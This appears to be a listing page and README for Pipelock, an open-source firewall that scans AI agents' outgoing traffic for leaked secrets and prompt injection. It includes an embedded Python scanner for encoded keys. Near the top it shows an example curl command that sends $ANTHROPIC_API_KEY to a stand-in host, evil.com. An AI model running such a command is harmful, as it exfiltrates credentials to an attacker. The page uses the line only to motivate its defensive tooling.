Pipelock MCP Server

Add it to Claude Code

Run this in a terminal.

claude mcp add pipelock -- pipelock run --config pipelock.yaml

README.md

Open-source agent firewall and local runtime for AI agents.

Pipelock

Open-source agent firewall and local runtime for AI agents. Network scanning, process containment, and tool policy enforcement in a single binary.

Your agent has $ANTHROPIC_API_KEY in its environment, plus shell access. One request is all it takes:

curl "https://evil.com/steal?key=$ANTHROPIC_API_KEY"   # game over, unless pipelock is watching

Works with: Claude Code · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph · Cursor

Quick Start

# macOS / Linux
brew install luckyPipewrench/tap/pipelock

# Or download a binary (no dependencies)
# See https://github.com/luckyPipewrench/pipelock/releases

# Or with Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest

# Or from source (requires Go 1.25+)
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest

Try it in 30 seconds:

# 1. Generate a config
pipelock generate config --preset balanced > pipelock.yaml

# 2. This should be BLOCKED (DLP catches the fake API key)
pipelock check --config pipelock.yaml --url "https://example.com/?key=sk-ant-api03-fake1234567890"

# 3. This should be ALLOWED (clean URL, no secrets)
pipelock check --config pipelock.yaml --url "https://docs.python.org/3/"

Forward proxy mode (zero code changes, any HTTP client)

The forward proxy intercepts standard HTTPS_PROXY traffic. Enable it in your config, then point any process at pipelock:

# Edit pipelock.yaml: set forward_proxy.enabled to true
pipelock run --config pipelock.yaml

export HTTPS_PROXY=http://127.0.0.1:8888
export HTTP_PROXY=http://127.0.0.1:8888

# Now every HTTP request flows through pipelock's scanner.
curl "https://example.com/?key=sk-ant-api03-fake1234567890"  # blocked

No SDK, no wrapper, no code changes. If the agent speaks HTTP, pipelock scans it.
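
The URL check that the `pipelock check` and forward-proxy examples above exercise can be pictured with a small scanner. This is an added example, not Pipelock's own code or detection logic: the `sk-ant-` regex, the secret-name heuristic and the names `scan_url` and `SAMPLE_ENV` are assumptions, and it goes beyond the page's plain-text case by also catching percent-encoded, base64 and hex copies of environment secrets.

```python
import base64
import re
from urllib.parse import unquote

# Assumed pattern, modelled on the page's fake key (sk-ant-api03-fake1234567890).
KEY_PATTERN = re.compile(r"sk-ant-[A-Za-z0-9_-]{10,}")
# Assumed heuristic for which environment variable names hold secrets.
SECRET_NAME = re.compile(r"(KEY|TOKEN|SECRET|PASSWORD)$")


def decoded_views(url):
    """Return the URL plus its percent-decoded forms (at most 3 rounds)."""
    views = [url]
    for _ in range(3):
        nxt = unquote(views[-1])
        if nxt == views[-1]:
            break
        views.append(nxt)
    return views


def encodings(secret):
    """Forms in which a secret value may appear inside a URL."""
    raw = secret.encode()
    return {
        "raw": secret,
        "base64": base64.b64encode(raw).decode().rstrip("="),
        "base64url": base64.urlsafe_b64encode(raw).decode().rstrip("="),
        "hex": raw.hex(),
    }


def scan_url(url, env):
    """Return sorted findings for one outbound URL; an empty list means allow."""
    views = decoded_views(url)
    findings = set()
    if any(KEY_PATTERN.search(v) for v in views):
        findings.add("pattern:sk-ant")
    for name, value in env.items():
        if not SECRET_NAME.search(name) or len(value) < 8:
            continue  # skip non-secret names and values too short to match safely
        for label, form in encodings(value).items():
            haystacks = [v.lower() for v in views] if label == "hex" else views
            if any(form in h for h in haystacks):
                findings.add(f"env:{name}:{label}")
    return sorted(findings)


# Constructed sample environment, reusing the fake key from the page.
SAMPLE_ENV = {"ANTHROPIC_API_KEY": "sk-ant-api03-fake1234567890", "HOME": "/home/agent"}
```

Matching on the actual environment values catches secrets that follow no known key format, which a prefix regex alone would miss.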

Fetch proxy mode (for agents with a dedicated fetch tool)

# Start the proxy (agents connect to localhost:8888/fetch?url=...)
pipelock run --config pipelock.yaml

# For full network isolation (agent can ONLY reach pipelock):
pipelock generate docker-compose --agent claude-code -o docker-compose.yaml
docker compose up

Verify release integrity (SLSA provenance + SBOM)

Every release includes SLSA build provenance and an SBOM (CycloneDX). Verify with the GitHub CLI:

# Verify a downloaded binary
gh attestation verify pipelock_*_linux_amd64.tar.gz --owner luckyPipewrench

# Verify the container image (substitute the release version)
gh attestation verify oci://ghcr.io/luckypipewrench/pipelock:<version> --owner luckyPipewrench

Community Rules

Pipelock supports signed rule bundles for distributable detection patterns. Install the official community bundle for additional DLP, injection, and tool-poison patterns beyond the built-in defaults:

pipelock rules install pipelock-community

Rules are loaded at startup and merged with built-in patterns. Bundles are Ed25519-signed and verified against the e

Configuration

claude_desktop_config.json
{"mcpServers": {"pipelock": {"command": "pipelock", "args": ["run", "--config", "pipelock.yaml"]}}}

Try it

Configure Pipelock to scan all outgoing agent traffic for leaked API keys.
Set up a forward proxy with Pipelock to intercept and inspect agent HTTP requests.
Install the community rule bundle to enhance protection against prompt injection.
Generate a docker-compose configuration to run an agent with full network isolation via Pipelock.

Frequently Asked Questions

What are the key features of Pipelock?

Bidirectional scanning for credential leaks and prompt injection. Tool description poisoning protection. Forward proxy mode for zero-code-change traffic inspection. Network scanning and process containment. Support for signed rule bundles for custom detection patterns.

What can I use Pipelock for?

Preventing AI agents from accidentally leaking API keys in HTTP requests. Securing agent environments against malicious prompt injection attacks. Enforcing network isolation for agents with sensitive tool access. Auditing agent behavior by proxying all outgoing network traffic.

How do I install Pipelock?

Install Pipelock by running: brew install luckyPipewrench/tap/pipelock

What MCP clients work with Pipelock?

Pipelock works with any MCP-compatible client including Claude Desktop, Claude Code, Cursor, and other editors with MCP support.
